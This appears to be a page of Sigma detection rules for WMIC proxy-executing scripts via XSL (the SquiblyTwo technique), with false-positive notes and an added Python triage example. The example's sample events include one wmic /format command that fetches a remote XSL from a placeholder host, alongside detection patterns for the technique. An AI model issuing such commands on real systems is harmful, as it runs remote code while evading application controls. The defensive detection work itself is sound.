WMIC Loading Scripting Libraries
Detects threat actors proxy-executing code and bypassing application controls by using wmic with the `/FORMAT` argument switch to download and execute an XSL file (e.g. containing JS, VBS, etc.). This could be an indicator of the SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.
```yaml
detection:
    selection:
        Image|endswith: '\wmic.exe'
        ImageLoaded|endswith:
            - '\jscript.dll'
            - '\vbscript.dll'
    condition: selection
```
False Positives
- The command `wmic os get lastbootuptime` loads vbscript.dll
- The command `wmic os get locale` loads vbscript.dll
- Since the ImageLoad event doesn't have enough information in this case, it's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights
- The command `wmic ntevent` loads vbscript.dll
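The triage step recommended above, as an added example (not part of the Sigma rule or the original page): it applies the rule's selection to Sysmon-style image-load events (Event ID 7) and joins each hit to its process creation event (Event ID 1) by ProcessGuid to inspect the `/FORMAT` value. The event dictionaries, verdict labels and function names are assumptions made for illustration.

```python
# Added example: constructed Sysmon-style events, not real telemetry.
import re

SCRIPT_DLLS = ("\\jscript.dll", "\\vbscript.dll")
# Captures the value of /format:<value>, with or without surrounding quotes.
FORMAT_RE = re.compile(r'/format\s*:\s*"?([^"\s]+)', re.IGNORECASE)

def rule_matches(ev):
    """The rule's selection: wmic.exe loading a scripting engine DLL (EID 7)."""
    return (ev.get("EventID") == 7
            and ev.get("Image", "").lower().endswith("\\wmic.exe")
            and ev.get("ImageLoaded", "").lower().endswith(SCRIPT_DLLS))

def classify(command_line):
    """Triage the spawning command line, as the false-positive note suggests."""
    m = FORMAT_RE.search(command_line or "")
    if not m:
        return "benign-likely"            # e.g. wmic os get lastbootuptime
    value = m.group(1).lower()
    if re.match(r"(https?:|\\\\)", value):  # URL or UNC path
        return "suspicious-remote-xsl"
    if value.endswith(".xsl") or "\\" in value or "/" in value:
        return "suspicious-local-xsl"
    return "review-builtin-format"        # bare keyword such as csv or list

def triage(events):
    """Join each rule hit to its process creation event (EID 1) by ProcessGuid."""
    creations = {e["ProcessGuid"]: e for e in events if e.get("EventID") == 1}
    results = []
    for ev in filter(rule_matches, events):
        proc = creations.get(ev["ProcessGuid"])
        verdict = classify(proc["CommandLine"]) if proc else "no-process-event"
        results.append((ev["ProcessGuid"], verdict))
    return results

# Constructed sample events (GUIDs, paths and host are placeholders).
WMIC = "C:\\Windows\\System32\\wbem\\WMIC.exe"
VBS = "C:\\Windows\\System32\\vbscript.dll"
JS = "C:\\Windows\\System32\\jscript.dll"
SAMPLE = [
    {"EventID": 1, "ProcessGuid": "{A}", "Image": WMIC, "CommandLine": "wmic os get lastbootuptime"},
    {"EventID": 7, "ProcessGuid": "{A}", "Image": WMIC, "ImageLoaded": VBS},
    {"EventID": 1, "ProcessGuid": "{B}", "Image": WMIC, "CommandLine": 'wmic os get /format:"https://example.invalid/a.xsl"'},
    {"EventID": 7, "ProcessGuid": "{B}", "Image": WMIC, "ImageLoaded": JS},
    {"EventID": 7, "ProcessGuid": "{C}", "Image": WMIC, "ImageLoaded": VBS},
]

if __name__ == "__main__":
    for guid, verdict in triage(SAMPLE):
        print(guid, verdict)
```

A hit with no matching process creation event is reported as `no-process-event` rather than dropped, since it still needs manual review of parent/child processes.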
Potential Remote SquiblyTwo Technique Execution
Detects potential execution of the SquiblyTwo technique that leverages Windows Management Instrumentation (WMI) to execute malicious code remotely. This technique bypasses application whitelisting by using wmic.exe to process malicious XSL (eXtensible Stylesheet Language) scripts that can contain embedded JScript or VBScript. The attack typically works by fetching XSL content from a remote source (using HTTP/HTTPS) and executing it with full trust privileges directly in memory, avoiding disk-based detection mechanisms. This is a common LOLBin (Living Off The Land Binary) technique used for defense evasion and code execution.
Detects similar activity. Both rules may fire on overlapping events.
XSL Script Execution Via WMIC.EXE
Detects the execution of WMIC with the "format" flag to potentially load local XSL files. Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
Detects similar activity. Both rules may fire on overlapping events.